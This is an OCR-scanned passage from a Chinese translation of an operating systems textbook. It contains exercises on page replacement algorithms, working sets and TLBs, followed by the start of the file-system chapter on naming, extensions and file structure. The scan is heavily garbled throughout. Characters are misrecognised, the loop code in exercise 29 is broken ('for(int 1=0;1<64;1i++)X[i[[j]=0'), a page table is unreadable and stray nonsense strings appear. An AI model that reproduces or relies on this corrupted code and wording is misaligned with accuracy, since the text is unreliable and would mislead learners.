(LRU，FIFO，Clock) 在 处 理 换 页 时 为 什么 效果 不 好 ? 


b) 如 果 一 个 程序 分 配 了 500 个 页 框 ， 请 描述 一 个 效果 优 于 LRU ` 
FIFO 或 Clock 算 法 的 页 面 置换 方法 。 


22. 如 果 将 FIFO 页 面 置 换算 法 用 到 4 个 页 框 和 8 个 页 面 上 ， 大 初始 时 
页 框 为 空 ， 访 问 字符 串 为 0172327103， 请 问 会 发 生 多 少 次 缺 页 中 断 ? 
如 果 使 用 LRU 算 法 呢 ? 


23. 考 虑 图 3-15b 中 的 页 面 序 列 。 假 设 从 页 面 B 到 页 面 A 的 R 位 分 别 
是 11011011。 使 用 第 二 次 机 会 算法 ， 被 移 走 的 是 哪个 页 面 ? 


24. 一 台 小 计算 机 有 4 个 页 框 。 在 第 一 个 时 钟 滴答 时 R 位 是 0111 (页 
面 0 是 0， 其 他 页 面 是 1) ， 在 随后 的 时 钟 滴答 中 这 个 值 是 1011、1010、 
1101、0010、1010、1100、0001。 如 果 使 用 带 有 8 位 计数 器 的 老化 算 
法 ， 给 出 最 后 一 个 滴答 后 4 个 计数 右 的 值 。 


25. 请 给 出 一 个 页 面 访问 序列 ， 其 第 一 个 被 选择 置换 的 页 面 必须 不 
同 于 Clock 和 LRU 算 法 。 假 设 一 个 进程 分 配 了 3 个 页 框 ， 访 问 串 中 的 页 
号 属于 集合 0，1，2，3。 


26. 在 图 3-21c 的 工作 和 集 时 钟 算法 中 ， 表 针 指 向 那个 R=0 的 页 面 。 如 
果 T=400， 这 个 页 面 将 被 移出 吗 ? 如果 t=1000 呢 ? 


27. 把 一 个 64KB 的 程序 从 平均 寻 道 时 间 10ms、 旋 转 延 迟 时 间 
10ms、 每 磁道 32KB 的 磁盘 上 装 入 ， 对 于 下 列 页 面 大 小 分 别 需 要 多 少 
时 间 ? 


a) 页 面 大 小 为 2KB。 
b) 页 面 大 小 为 4KB。 


假设 页 面 随机 地 分 布 在 磁盘 上 ， 柱 面 的 数目 非常 大 以 至 于 两 个 页 
面 在 同一 个 柱 面 的 机 会 可 以 忽略 不 计 。 


28 一 个 计算 机 有 4 个 页 框 ， 洲 入 时 间 、 上 次 访问 时 间 和 每 个 页 的 R 
位 和 M 位 如 下 所 示 (时 间 以 时 钟 滴答 为 单位 ) : 


a)NRU 算 法 将 置换 哪个 页 面 ? 
b)FIFO 算 法 将 置换 哪个 页 面 ? 
c)LRU 算 法 将 置换 哪个 页 面 ? 

dd) 第 二 次 机 会 算法 将 置换 哪个 页 面 ? 
29. 有 二 维 数组 : 


int x[64][64]; 


假设 系统 中 有 4 个 页 框 ， 每 个 页 框 大 小 为 128 个 字 (一 个 整数 占用 
一 个 字 ) 。 处 理 数 组 X 的 程序 正好 可 以 放 在 一 页 中 ， 而 且 总 是 占用 0 号 
页 。 数 据 会 在 其 他 3 个 页 框 中 被 换 入 或 换 出 。 数 组 X 为 按 行 存储 ( 即 ， 
在 内 存 中 ，X[0][0] 之 后 是 X[0][1]) 。 下 面 两 段 代 码 中 ， 哪 一 个 会 有 最 
少 的 缺 页 中 断 ” 请 解释 原因 ， 并 计算 缺 页 中 断 的 总 数 。 


ABR: 


for(int j=0;j<64; j++) 
for(int 1=0;1<64;1i++)X[i[[j]=0; 


BEX: 


for(int i=0;i<64;i++) 
for(int j=0;j<64;j++)X[i][[j]=0; 
30.PDP-1 有 是 最 早 的 分 时 计算 机 之 一 ， 有 4K 个 18 位 字 的 内 存 。 在 每 
个 时 刻 它 在 内 存 中 保持 一 个 进程 。 当 调度 程序 决定 运行 另 一 个 进程 
时 ， 将 内 存 中 的 进程 写 到 一 个 换 页 磁 怪 上 ， 磁 或 的 表面 有 4K 个 18 位 
字 。 磁 鼓 可 以 从 任何 字 开 始 读 写 ， 而 不 仅仅 是 字 0。 请 解释 为 什么 要 选 


JX MEE? 


31. 一 台 计 算 机 为 每 个 进程 提供 65 536 字 节 的 地 址 空间 ， 这 个 地 址 
空间 被 划分 为 4096 字 市 的 页 面 。 一 个 特定 的 程序 有 327 6857 TIIE 
文 、16 386 字 市 的 数据 和 15 870 字 市 的 堆栈 。 这 个 程序 能 流入 这 个 地 址 
空间 吗 ? 如 采 页 面 大 小 是 512 字 市 ， 能 放 得 下 吗 ? 记 住 一 个 页 面 不 能 同 
时 包含 两 个 不 同 段 的 成 分 。 


32. 一 个 页 面 同一 时 刻 可 能 在 两 个 工作 集中 吗 ? 请 解释 原因 。 


33. 人 们 已 经 观察 到 在 两 次 缺 页 中 断 之 间 执 行 的 指令 数 与 分 配给 程 
序 的 页 框 数 直接 成 比例 。 如 宁可 用 内 存 加 倍 ， 缺 页 中 断 间 的 平均 间隔 
也 加 倍 。 假 设 一 条 普通 指令 需要 1hs， 但 是 如 果 发 生 了 缺 页 中 断 就 需要 


2001ps 〈 即 2ms 处 理 缺 页 中 断 》。 如 果 一 个 程序 运行 了 60s， 期 间 发 生 
了 15 000 次 缺 页 中 断 ， 如 果 可 用 内 存 是 原来 的 两 倍 ， 那 么 这 个 程序 运 


行 需要 多 少时 间 ? 


34.Frugal 计 算 机 公司 的 一 组 操作 系统 设计 人 员 正 在 考虑 在 他 们 的 
新 操作 系统 中 减少 对 后 备 存 储 数 量 的 需求 。 老 板 建 议 根本 不 要 把 程序 
正文 保存 在 交换 区 中 ， 而 是 在 需要 的 时 候 直接 从 二 进 制 文件 中 调 页 进 
来 。 在 什么 条 件 下 (如 果 有 这 样 的 条 件 话 ) 这 种 想法 适用 于 程序 文 
AN? 在 什么 条 件 下 (如 果 有 这 样 的 条 件 话 ， 这 种 想法 适用 于 数据 ? 


35. 有 一 条 机 器 语言 指令 将 要 被 调 入 ， 该 指令 可 把 一 个 32 位 子 装 入 
有 32 位 字 地 址 的 寄存 器。 这 个 指令 可 能 引起 的 最 大 缺 页 中 断 次 数 是 


on 
多 少 ? 


36. 像 在 MULTICS 中 那样 ， 当 同时 使 用 分 段 和 分 页 时 ， 首 先 必须 
查找 段 描述 符 ， 然 后 是 页 描述 符 。TLB 也 是 这 样 按 两 级 查找 的 方式 工 
作 的 吗 ? 


37. 一 个 程序 中 有 两 个 段 ， 段 0 中 为 指令 ， 段 1 中 为 读 / 写 数据 。 段 0 
有 该 /执行 保护 ， 段 1 有 读 / 写 保护 。 内 存 是 请 求 分 页 式 虚 拟 内 存 系统 ， 
它 的 虚拟 地 址 为 4 位 页 号 ，10 位 偏 移 量 。 页 表 和 保护 如 下 所 示 〈 表 中 的 
数字 均 为 十 进 制 ) : 


AWE NE À | ES yl E5 
o o | 2 č | 0 | ZER | 
=$ E a 


对 于 下 面 的 每 种 情形 ， 或 者 给 出 动态 地 址 所 对 应 的 实 (实际 ) 内 
存 地 址 ， 或 者 指出 发 生 了 哪 种 失效 〈 缺 页 中 断 ， 或 保护 错误 ) 。 


a) 读 取 页 : 段 1， 页 1， 偏 移 3;: 
b) 存 储 页 ， 段 0?， 页 0， 偏 移 16; 
o 读 取 页 : 段 1， 页 4， 偏 移 28 


d) 跳 转 到 :上 段 1， 页 3， 偏 移 32 


38. 你 能 想象 在 哪些 情况 下 支持 虚拟 内 存 是 个 坏 想 法 吗 ? 不 支持 虚 
拟 内 存 能 得 到 什么 好 处 呢 ? 请 解释 。 


39. 构 造 一 个 柱状 图 ， 计 算 你 的 计算 机 中 可 执行 二 进 制 文件 大 小 的 
平均 值 和 中 间 值 。 在 Windows 系 统 中 ， 观 察 所 有 的 .exe 和 .dl 文件 ; 在 
UNIX 系 统 中 ， 观 察 /bin、/usr/bin、/local/bin 目 录 下 的 所 有 非 脚本 文件 
的 可 执行 文件 (或 者 使 用 file 工 具 来 查找 所 有 的 可 执行 文件 ) 。 确 定 这 
台 机 器 的 最 优 页 面 大 小 ， 只 考虑 代码 〈 不 包括 数据 ) 。 考 虚 内 部 雄 厂 
和 页 表 大 小 ， 对 页 表 项 的 大 小 做 出 合理 的 假设 。 假 设 所 有 的 程序 被 执 
行 的 可 能 性 相同 ， 所 以 可 以 同等 对 待 。 


40.MS-DOS 中 的 小 程序 可 以 编译 成 .COM 文 件 。 这 些 文件 总 是 凑 
载 到 0x100 地 址 的 一 个 内 存 段 ， 这 个 内 存 段 用 作 代码 、 数 据 和 堆栈 。 转 
移 执行 的 控制 指令 (如 JMP、CALL) 和 访问 静态 数据 的 指令 把 地 址 编 
译 进 目标 代码 中 。 写 一 个 程序 重 定 同 这 个 程序 文件 ， 使 之 可 以 在 任意 
开始 地 址 处 运行 。 读 者 的 程序 必须 扫 摘 代码 ， 寻 找 指 回回 定 内 存 地 址 
的 目标 代码 ， 然 后 在 重 定 同 范围 内 修改 那些 指向 内 存单 元 的 地 址 。 可 
以 在 汇编 语言 程序 正文 中 找到 这 些 目 标 地 址 。 注 意 ， 要 想 不 借 助 于 额 
外 的 信息 束 出 色 完 成 这 项 工作 通常 是 不 可 能 的 ， 因 为 有 些 数据 子 的 值 
和 指令 目标 代码 相仿 。 


41. 编 写 一 个 程序 ， 它 使 用 老化 算法 模拟 一 个 分 页 系统 。 页 框 的 数 
量 是 参数 。 页 面 访问 序列 从 文件 中 读 取 。 对 于 一 个 给 定 的 输入 文件 ， 
列 出 每 1000 个 内 存 访问 中 发 生 缺 页 中 断 的 数目 ， 它 是 可 用 页 框 数 的 函 


数 。 


42. 编 写 一 个 程序 ， 说 明 TLB 失 效 对 有 效 内 存 存 取 时 间 的 影响 ， 内 
存 存 取 时 间 可 以 用 计算 每 次 这 历 大 数组 时 的 读 取 时 间 来 衡量 。 


a) 解 释 编 程 思想 ， 并 措 述 所 期 望 输出 如 何 展示 一 些 实际 的 虚拟 内 
存 体系 结构 。 


b) 运 行 该 程序 ， 并 解释 运行 结果 与 你 的 预期 有 何 出 入 。 


0) 在 一 台 更 古老 的 且 有 着 不 同体 系 结构 的 计算 机 上 重复 b)， 并 解 
释 输出 上 的 区 别 。 


43. 编 写 一 个 程序 ， 该 程序 能 说 明 当 有 两 个 进程 的 人 简 单 情况 下 ， 使 
用 局 部 页 置换 集 略 和 全 局 页 置换 策略 的 差异 。 读 者 将 会 用 到 能 生成 一 
个 基于 统计 模型 的 页 面 访问 串 的 例 程 。 这 个 模型 有 N 个 状态 ， 从 0 到 N- 
1， 代 表 每 个 可 能 的 页 面 访问 ， 每 个 状态 i 相关 的 概率 pi 代表 下 一 次 访 
问 仍 指 加 同一 页 面 的 几率 。 和 否则 ， 下 一 次 页 面 访问 将 以 等 概率 指 回 其 
他 任何 一 个 页 面 。 


a) 说 明 当 NN 比较 小 时 ， 页 面 访问 串 生 成 例 程 能 运行 正常 。 


b) 对 有 一 个 进程 和 固定 数量 的 页 框 的 情况 计算 缺 页 中 断 率 。 解 释 
这 种 结果 为 什么 是 正确 的 。 


c 对 有 独立 页 面 访问 序列 的 两 个 进程 ， 以 及 是 b) 中 页 框 数 两 倍 的 
页 框 ， 重 复 b)。 


第 4 章 ”文件 系统 


所 有 的 计算 机 应 用 程序 都 需要 存储 和 检索 信息 。 进程 运 行 时 ， 可 
以 在 它 目 己 的 地 址 空间 存储 一 定量 的 信息 ， 但 存储 容量 受 虚 拟 地 址 空 
间 大 小 的 限制 。 对 于 某 些 应 用 程序 ， 它 自己 的 地 址 空间 已 经 足够 用 
T; 但 是 对 于 其 他 一 些 应 用 程序 ， 例 如 航空 订 票 系统 、 银 行 系统 或 者 
公司 记 账 系统 ， 这 些 存储 空间 又 显得 太 小 了 。 


在 进程 的 地 址 空间 上 保存 信息 的 第 二 个 问题 是 :进程 终止 时 ， 它 
保存 的 信息 也 随 之 丢失 。 对 于 很 多 应 用 (如 数据 库 ) 而 言 ， 有 关 信息 
必须 能 保存 几 星期 、 几 个 月 ， 甚 至 永久 保留 。 在 使 用 信息 的 进程 终止 
AY, ee Be SADR AA, EE, Bl ite AST ABBE EEA 
了 ， 这 些 信息 也 应 该 保存 下 来 。 


第 三 个 问题 是 : 经 常 需要 多 个 进程 同时 存 取 同 一 信息 (或 者 其 中 

HE) 。 如 果 只 在 一 个 进程 的 地 址 空间 里 保存 在 线 电话 敌 ， 那 么 
只 有 该 进程 才 可 以 对 它 进行 存 取 ， 也 就 古 说 一 次 只 能 查找 一 个 电话 与 
码 。 解 决 这 个 问题 的 方法 是 使 信息 本 身 独 立 于 任何 一 个 进程 。 


因此 ， 长 期 存储 信息 有 三 个 基本 要 求 : 


1) 能 够 存储 大 量 信息 。 


2) 使 用 信息 的 进程 终止 时 ， 信 息 仍 旧 存 在 。 


3) 必 须 能 使 多 个 进程 并 发 存 取 有 头 信息。 


磁盘 (magnetic disk) 由 于 其 长 期 存储 的 性 质 ， 已 经 有 多 年 的 使 用 
历史 。 和 磁带 与 光 弄 虽然 也 在 使 用 ， 但 它们 的 性 能 很 低 。 我 们 将 在 第 5 章 
学 习 更 多 有 关 磁 盘 的 知识 ， 但 目前 我 们 可 以 匈 把 位 一 当 作 一 种 固定 块 
大 小 的 线性 序列 ， 并 且 支 持 如 下 两 种 操作 : 


1) 读 块 k; 


2) 写 块 k。 


事实 上 磁盘 支持 更 多 的 操作 ， 但 只 要 有 了 这 两 种 操作 ， 原 则 上 束 
可 以 解决 长 期 存储 的 问题 。 


不 过 ， 这 里 存在 着 很 多 不 便于 实现 的 操作 ， 特 别 是 在 有 很 多 程序 
或 者 多 用 户 使 用 着 的 大 型 系统 上 (如 服务 器 ) 。 在 这 种 情况 下 ， 很 容 
易 产 生 一 些 问题 ， 例 如 : 


1) 如 何 找 到 信息 ? 
2) 如 何 防 止 一 个 用 户 读 取 为 一 个 用 户 的 数据 ? 


3) 如 何 知 道 哪 些 块 是 空 几 的 ? 


就 像 我 们 看 到 的 操作 系统 提取 处 理 器 的 概念 来 建立 进程 的 抽象 ， 
以 及 提取 物理 存储 器 的 概念 来 建立 进程 (虚拟) 地址 空间 的 抽象 那 
样 ， 我 们 可 以 用 一 个 新 的 抽象 一 一 文件 来 解决 这 个 问题 。 进 程 (与 线 
程 ) 、 地 址 空间 和 文件 ， 这 些 抽象 概念 均 是 操作 系统 中 最 重要 的 概 
念 。 如 果真 正 深 入 理解 了 这 三 个 概念 ， 那 么 读者 就 到 上 了 成 为 一 个 操 
作 系 统 专 家 的 道路 。 


文件 是 进程 创建 的 信息 逻辑 单元 。 一 个 磁盘 一 般 含 有 几 和 于 甚至 几 
百 万 个 文件 ， 每 个 文件 是 独立 于 其 他 文件 的 。 文 件 不 仅仅 被 用 来 对 磁 
盘 建 模 ， 以 蔡 代 对 随机 存储 器 (RAM) 的 建 模 ， 事 实 上， 如果 能 把 每 
个 文件 看 成 一 种 地 址 空间 ， 那 么 读者 束 离 理解 文件 的 本 质 不 远 了 。 


进程 可 以 读 取 已 经 存在 的 文件 ， 并 在 需要 时 建立 新 的 文件 。 存 储 
在 文件 中 的 信息 必须 是 持久 的 ， 也 避 ® 是 说 ， 不 会 因为 进程 的 创建 与 终 
止 而 受到 影响 。 一 个 文件 应 只 在 其 所 有 者 明确 删除 它 的 情况 下 才 会 消 
失 。 尽 管 读 写 文 件 是 最 常见 的 操作 ， 但 还 存在 着 很 多 其 他 操作 ， 其 中 
的 一 些 我 们 将 在 下 面 加 以 介绍 。 


文件 是 受 操 作 系 统管 理 的 。 有 关 文 件 的 构造 、 命 名 、 存 取 、 使 
用 、 保 护 、 实 现 和 管理 方法 都 是 操作 系统 设计 的 主要 内 容 。 从 总 体 上 
看 ， 操 作 系统 中 处 理 文 件 的 部 分 称 为 文件 系统 (file system) ， 这 就 是 


本 章 的 论题 。 


从 用 户 角度 来 看 ， 文 件 系统 中 最 重要 的 是 它 在 用 户 眼 中 的 表现 形 
式 ， 也 束 生 文件 是 由 什么 组 成 的 ， 怎 样 给 文件 命名 ， 生 样 你 护 文件 ， 
以 及 可 以 对 文件 进行 哪些 操作 等 。 至 于 用 链表 还 是 用 位 图 来 记录 空 闪 
存储 区 以 及 在 一 个 逻辑 磁 强 块 中 有 多 少 个 忆 区 等 细 世 并 不 是 用 户 所 天 
心 的 ， 当 然 对 文件 系统 的 设计 者 来 说 这 些 内 容 是 相当 重要 的 。 正 因为 
如 此 ， 本 章 将 分 为 镍 讲述， 前 两 节 分 别 叙述 在 用 户 层面 的 关注 内 容 
一 一 文件 和 目录 ， 随 后 是 有 关 文 件 系 统 实现 的 详细 讨论 ， 最 后 是 文件 
系统 的 一 些 实例 。 


4.1 文件 


在 本 节 中 ， 我 们 从 用 户 角 度 来 考察 文件 ， 也 就 是 说 ， 用 户 如 何 使 
用 文件 ， 文 件 具 有 哪些 等 性 。 


4.1.1 文件 命名 
文件 是 一 种 抽象 机 制 ， 它 提供 了 一 种 在 磁盘 上 保留 信息 而 且 方便 


以 后 读 取 的 方法 。 这 种 方法 可 以 使 用 户 不 用 了 解 存储 信息 的 方法 、 位 
置 和 实际 磁盘 工作 方式 等 有 关 细节 。 


也 许 任何 一 种 抽象 机 制 的 最 重要 的 特性 就 是 对 管理 对 象 的 命名 方 
式 ， 所 以 ， 我 们 将 从 对 文件 的 命名 开始 考察 文件 系统 。 在 进程 创建 文 


件 时 ， 它 给 文件 命名 。 在 进程 终止 时 ， 该 文件 仍旧 存在 ， 并 且 其 他 进 
程 可 以 通过 这 个 文件 名 对 它 进 行 访问 。 


文件 的 具体 命名 规则 在 各 个 系统 中 是 不 同 的 ， 不 过 所 有 的 现代 操 
作 系 统 都 允许 用 1 至 8 个 字母 组 成 的 字符 串 作 为 合法 的 文件 名 。 因 此 ， 
andrea、bruce 和 cathy 痢 是 合法 文件 名 。 通 音 ， 文 件 名 中 也 允许 有 数字 
和 一 些 特 殊 字 符 ， 所 以 像 2、urgent! 和 Fig.2-14 也 是 合法 的 。 许 多 文件 系 
统 支 持 长 达 255 个 字符 的 文件 名 。 


有 的 文件 系统 区 分 大 小 写字 母 ， 有 的 则 不 区 分 。UNIX 是 前 一 类 ， 
MS-DOS 是 后 一 类 。 所 以 在 UNIX 系 统 中 maria、Maria 和 MARIA 是 三 个 
不 同 的 文件 ， 而 在 MS-DOS 中 ， 它 们 是 同一 个 文件 。 


关于 文件 系统 在 这 里 需要 插 一 句 ，Windows 95 与 Windows 98 用 的 
都 是 MS-DOS 的 文件 系统 ， 即 FAT-16， 因 此 继承 了 其 很 多 性 质 ， 例 如 有 
关 文件 名 的 构造 方法 。Windows 98 对 FAT-16 引 入 了 一 些 扩展 ， 从 而 成 
为 FAT-32， 但 这 两 者 是 很 相似 的 。 并 且 ，Windows NT ` Windows 
2000 ` Windows XP 和 Windows Vista 支 持 这 两 种 已 经 过 时 的 FAT 文 件 系 
统 。 这 4 个 基于 NT 的 操作 系统 有 着 一 个 自 带 文件 系统 (NTFS) | ER 
有 很 多 不 同 的 性 质 (例如 基于 Unicode 的 文件 名 ) 。 在 本 章 中 ， 当 提 到 
MS-DOS 或 FAT 文 件 系 统 的 时 候 ， 我 们 指 的 是 用 在 Windows 上 的 FAT-16 
和 FAT-32， 除 非特 别 指明 。 我 们 将 晚 一 些 在 这 章 讨论 FAT 文 件 系 统 ，3 


在 第 11 章 讨论 NTFS， 并 细致 地 分 析 了 Windows Vista ° 


许多 操作 系统 文 持 文 件 名 用 圆 点 隔 开 分 为 两 部 分 ， 如 文件 名 
prog.c。 圆 点 后 面 的 部 分 称 为 文件 扩展 名 (file extension) ， 文 件 扩展 
名 通常 表示 文件 的 一 些 信息 ， 如 MS-DOS 中 ， 文 件 名 由 1 至 8 个 字符 以 及 
1 至 3 个 字符 的 可 选 扩展 名 组 成 。 在 UNIX 里 ， 如 果 有 扩展 名 ， 则 扩展 名 
长 度 完全 由 用 户 决 定 ， 一 个 文件 甚至 可 以 包含 两 个 或 更 多 的 扩展 名 。 
如 homepage.html.zip， 这 里 .html 表 明 HTML 格 式 的 一 个 Web 页 面 ，.zip 表 
示 该 文件 (homepage.html) 已 经 采用 zip 程 序 压缩 过 。 一 些 常用 文件 扩 
展 名 及 其 含义 如 图 4-1 所 示 。 


扩展 名 会 

file.bak 备份 文件 

file.c | Cc 源 程 序 文件 

file.gif 符合 图 形 交 换 格式 的 图 像 文件 

file.hlp 帮助 文件 

file.htm| ”| WWW 超 文本 标记 语言 文档 

file.jpg 符合 JPEG 编 码 标准 的 静态 图 片 

file.mp3 符合 MP3 音 频 编码 格式 的 音乐 文件 
符合 MPEG 编 码 标准 的 电影 


目标 文件 (编译 器 输出 格式 ， 尚 未 连接 ) 


pdf 格 式 的 文件 
file.ps PostScript 文 件 7 
为 TEX 格 式 化 程序 准备 的 输入 文件 
file.txt ”| 一 般 正文 文件 
file.zip 压缩 文件 


图 4-1 一 些 典 型 的 文件 扩展 名 


在 某 些 系统 中 (如 UNIX) ， 文 件 扩展 名 只 是 一 种 约定 ， 操 作 系 统 
并 不 强 担 采用 它 。 名 为 fe.txt 的 文件 也 许 是 文本 文件 ， 这 个 文件 名 在 于 
提醒 所 有 者 ， 而 不 是 表示 传送 什么 信息 给 计算 机 。 但 是 另 一 方面 ，C 编 
译 器 可 能 要 求 它 编译 的 文件 以 .c 结 尾 ， 否 则 它 会 拒绝 编译 。 


对 于 可 以 处 理 多 种 类 型 文件 的 某 个 程序 ， 这 类 约定 是 特别 有 用 
的 。 例 如 ，C 编 译 夯 可 以 编译 、 连 接 多 种 文件 ， 包 括 C 文 件 和 汇编 语言 
文件 。 这 时 扩展 名 吏 很 上 必要， 编译 需 利 用 它 区 分 哪些 是 C 文 件 ， 哪 些 是 
CRF, RHE HICH o 


相反 ，Windows 对 扩展 名 赋予 含义 。 用 户 或 进程 ) 可 以 在 操作 系 
统 中 注册 扩展 名 ， 并 且 规 定 哪 个 程序 “拥有 ”该 扩展 名 。 当 用 户 双击 某 
个 文件 名 时 ，“ 拥 有 ”该 文件 扩展 名 的 程序 就 启动 并 运行 该 文件 。 例 
如 ， 双 击 fe.doc 启 动 了 Microsoft Word 程 序 ， 并 以 file.doc 作 为 竺 编辑 的 
初始 文件 。 


4.1.2 ”文件 结构 


文件 可 以 有 多 种 构造 方式 ， 在 图 4-2 中 列 出 了 常用 的 三 种 方式 。 图 
4-2a 中 的 文件 是 一 种 无 结构 的 字 市 序列 ， 操 作 系 统 事实 上 不 知道 也 不 关 
心 文件 内 容 是 什么 ， 操 作 系 统 所 见 到 的 就 是 字 节 ， 其 任何 含义 只 在 用 
户 程序 中 解释 。 在 UNIX 和 Windows 中 都 采用 这 种 方法 。 


1 个 字 节 I 个 记录 


| Cat | Cow | Dog | Goa | tion | ow | [| Pony | Rat [worm] 


| Hen || wis [Lamb 


a) b) c) 


图 4-2 三 种 文件 结构 ，a) 字 市 序列 ，b) 记 有 杂 序 列 ，c) 树 


把 文件 看 成 字 节 序列 为 操作 系统 提供 了 最 大 的 灵活 性 。 用 户 程 序 
可 以 向 文件 中 加 入 任何 内 容 ， 并 以 任何 方便 的 形式 命名 。 操 作 系统 不 
提供 任何 帮助 ， 但 也 不 会 构成 阻碍 。 对 于 想 做 特殊 操作 的 用 户 来 说 ， 
后 者 是 非常 重要 的 。 所 有 UNIX、MS-DOS 以 及 Windows 都 采用 这 种 文 
件 模 型 。 


图 4-2b 表 示 在 文件 结构 上 的 第 一 步 改进 。 在 这 个 模型 中 ， 文 件 是 具 
有 固定 长 度 记录 的 序列 ， 每 个 记录 都 有 其 内 部 结构 。 把 文件 作为 记录 
序列 的 中 心思 想 是 ， 读 操作 返回 一 个 记录 ， 而 写 操作 重 写 或 追加 一 个 
记录 。 这 里 对 “记录 ”给 予 一 个 历史 上 的 说 明 ， 几 十 年 前 ， 当 80 列 的 穿 
孔 卡 片 还 是 主流 的 时 候 ， 很 多 (大 型 机 ) 操作 系统 把 文件 系统 建立 在 
由 80 个 字符 的 记录 组 成 的 文件 基础 之 上 。 这 些 操 作 系 统 也 支持 132 个 字 
符 的 记录 组 成 的 文件 ， 这 是 为 了 适应 行 式 打印 机 〈 当 时 的 行 式 打印 机 
有 132 列 宽 ) 。 程 序 以 80 个 字符 为 单位 读 入 数据 ， 并 以 132 个 字符 为 单 
位 写 数据 ， 其 中 后 面 52 个 字符 都 是 空格 。 现 在 已 经 没有 以 这 种 方式 工 
作 的 通用 系统 了 ， 但 是 在 80 列 穿孔 卡片 和 132 列 宽 行 式 打印 机 流行 的 日 
子 里 ， 这 是 大 型 计算 机 系统 中 的 常见 模式 。 


第 三 种 文件 结构 如 图 4-2c 所 示 。 文 件 在 这 种 结构 中 由 一 棵 记录 树 构 
成 ， 每 个 记录 并 不 具有 同样 的 长 度 ， 而 记录 的 固定 位 置 上 有 一 
个 “ 键 "字段 。 这 棵 树 按 “ 键 "字段 进行 排序 ， 从 而 可 以 对 特定 “ 键 ”进行 快 
速 查找 。 


虽然 在 这 类 结构 中 取 * 下 一 个 ”记录 是 可 以 的 ， 但 是 基本 操作 并 不 
征 取 “下 一 个 ”记录 ， 而 是 获得 具有 符 定 键 的 记录 。 如 图 4-2c 中 的 文件 
zoo， 用 户 可 以 要 求 系统 取 键 为 pony 的 记录 ， 而 不 必 关 心 记 录 在 文件 中 
的 确切 位 置 。 进 而 ， 可 以 在 文件 中 添加 新 记录 。 但 是 ， 把 记录 加 在 文 
件 的 什么 位 置 是 由 操作 系统 而 不 是 用 户 决定 的 。 这 类 文件 结构 与 UNIX 


和 Windows 中 采用 的 无 结构 子 市 流明 显 不 同 ,但 它 在 一 些 处 理 丙 业 数 据 
的 大 型 计算 机 中 获得 广泛 使 用 。 


4.1.3 ”文件 类 型 


很 多 操作 系统 支持 多 种 文件 类 型 。 如 UNIX 和 Windows 中 都 有 普通 
文件 和 目录 ，UNIX 还 有 字符 特殊 文件 (character special file) 和 块 特殊 
文件 (block special file) 。 普 通 文件 (regular file) 中 包含 有 用 户 信 
息 。 图 4-2 中 的 所 有 文件 都 是 普通 文件 。 目 录 (directory) 是 管理 文件 
系统 结构 的 系统 文件 ， 将 在 以 后 的 章节 中 讨论 。 字 符 特 殊 文 件 和 输入 / 
输出 有 关 ， 用 于 串 行 WO 类 设备 ， 如 终端 、 打 印 机 、 网 络 等 。 块 特殊 文 
件 用 于 磁盘 类 设备 。 本 章 主要 讨论 普通 文件 。 


普通 文件 一 般 分 为 ASCII 文 件 和 二 进 制 文件 。ASCII 文 件 由 多 行 正 
文 组 成 。 在 某 些 系统 中 ， 每 行 用 回 车 符 结束 ， 其 他 系统 则 用 换行 符 结 
束 。 有 些 系统 还 同时 采用 回 车 符 和 换行 符 (如 MS-DOS) 。 文 件 中 各 行 
的 长 度 不 一 定 相 同 。 


ASCII 文 件 的 最 大 优势 是 可 以 显示 和 打印 ， 还 可 以 用 任何 文本 编辑 
器 进行 编辑 。 再 者 ， 如 果 很 多 程序 都 以 ASCII 文 件 作 为 输入 和 输出 ， 惑 


(用 管道 实现 进程 间 通 信 并 非 更 容易 ， 但 若 以 一 种 公认 的 标准 (如 
ASCII 码 ) 来 表示 ， 则 更 易于 理解 一 些 。) 


其 他 与 ASCII 文 件 不 同 的 十 二 进 制 文 件 。 打 印 出 来 的 二 进 制 文件 是 
无 法 理解 的 、 充 满 混乱 字符 的 一 张 表 。 通 季 ， 二 进 制 文件 有 一 定 的 内 
部 结构 ， 使 用 该 文件 的 程序 才 了 解 这 种 结构 。 


如 图 4-3a 是 一 个 简单 的 可 执行 二 进 制 文件 ， 它 取 自 某 个 版 本 的 
UNIX 。 尽 管 这 个 文件 只 是 一 个 字 节 序列 ， 但 只 有 文件 的 格式 正确 时 ， 
操作 系统 才 会 执行 这 个 文件 。 这 个 文件 有 五 个 段 : MR ` IEX ` Zt 
据 、 重 定位 位 及 符号 表 。 文 件 头 以 所 谓 的 魔 数 (magic number) 开始 ， 
表明 该 文件 是 一 个 可 执行 的 文件 (防止 非 这 种 格式 的 文件 偶然 运 
47) 。 魔 数 后 面 是 文件 中 各 段 的 长 度 、 执 行 的 起 始 地 址 和 一 些 标志 
位 。 程 序 本 喘 的 正文 和 数据 在 文件 头 后 面 。 这 些 被 装 入 内 存 ， 并 使 用 
重 定 位 位 重新 定位 。 符 号 表 则 用 于 调试 。 


文件 头 


h 正文 
| | 目标 模块 


重 定 位 位 


目标 模块 


a) b) 


图 4-3 a) 一 个 可 执行 文件 ，b) 一 个 存档 文件 


二 进 制 文件 的 第 二 个 例子 是 UNIX 的 存档 文件 ， 它 由 已 编译 但 没有 
连接 的 库 过 程 (BR) 集合 而 成 。 每 个 文件 以 模块 头 开 始 ， 其 中 记录 
了 和 名称、 创建 日 期 、 所 有 者 、 保 护 码 和 文件 大 小 。 该 模块 头 与 可 执行 
文件 一 样 ， 也 都 是 二 进 制 数字 ， 打 印 输出 它们 之 无 意义 。 


所 有 操作 系统 必须 能 够 识别 它们 自己 的 可 执行 文件 的 文件 类 型 ， 
其 中 有 些 操作 系统 还 可 识别 更 多 的 信息 。 一 种 老式 的 TOPS-20 操 作 系统 
(用 于 DECsystem20 计 算 机 ) 甚至 可 检查 可 执行 文件 的 创建 时 间 ， 然 
后 ， 天 可 以 找到 相应 的 产 文 件 ， 看 它 在 二 进 制 文件 生成 后 是 否 被 修改 
过 。 如 来 修改 过 ， 操 作 系 统 目 动 重新 编 详 这 个 文件 。 在 UNIX 中 ， 殊 是 
在 shell 中 杉 入 make 程 序 。 这 时 操作 系统 要 求 用 户 必 须 采 用 固定 的 文件 
扩展 名 ， 从 而 确定 哪个 源 程序 生成 哪个 二 进 制 文件 。 


如 果 用 户 执行 了 系统 设计 者 没有 考虑 到 的 某 种 操作 ， 这 种 强制 类 
型 的 文件 有 可 能 会 引起 麻烦 。 比 如 在 一 个 系统 中 ， 程 序 输出 文件 的 扩 
展 名 是 .dat (数据 文件 ) ， 若 用 户 写 一 个 格式 化 程序 ， 读 入 .c (CEF) 
文件 并 转换 它 (比如 把 该 文件 转换 成 标准 的 首 行 缩 进 ， 再 把 转换 后 
